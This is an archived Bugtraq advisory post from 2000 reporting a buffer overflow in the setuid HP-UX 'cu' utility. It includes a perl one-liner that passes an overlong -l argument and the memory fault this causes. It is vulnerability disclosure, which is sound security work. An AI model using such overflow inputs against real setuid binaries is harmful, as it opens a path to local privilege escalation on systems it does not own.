[17460] in bugtraq
HPUX cu -l option buffer overflow vulnerabilit
daemon@ATHENA.MIT.EDU (zorgon)
Thu Nov 2 12:33:28 2000
Content-Type: text/plain
Content-Disposition: inline
Mime-Version: 1.0
Message-ID: <200011021343.eA2DhRU20236@tbird.iworld.com>
Date: Thu, 2 Nov 2000 08:43:27 -0500
Reply-To: zorgon <zorgon@LINUXSTART.COM>
From: zorgon <zorgon@LINUXSTART.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
=======================================================
HPUX cu -l option buffer overflow vulnerability
=======================================================
Date: 02/11/2000
Tested on HP-UX B.11.00
$ ls -la `which cu`
-r-sr-xr-x 1 bin 40960 9 avr 1998 /bin/cu
Using '-l' with a long option string:
$ cu -l `perl -e 'printf "A" x 9777'`
La connexion a chou : Requested device/system name not known
$ cu -l `perl -e 'printf "A" x 9778'`
Memory fault
==================================
zorgon <zorgon@linuxstart.com>
http://www.nightbird.free.fr
----------------------
Do you do Linux? :)
Get your FREE @linuxstart.com email address at: http://www.linuxstart.com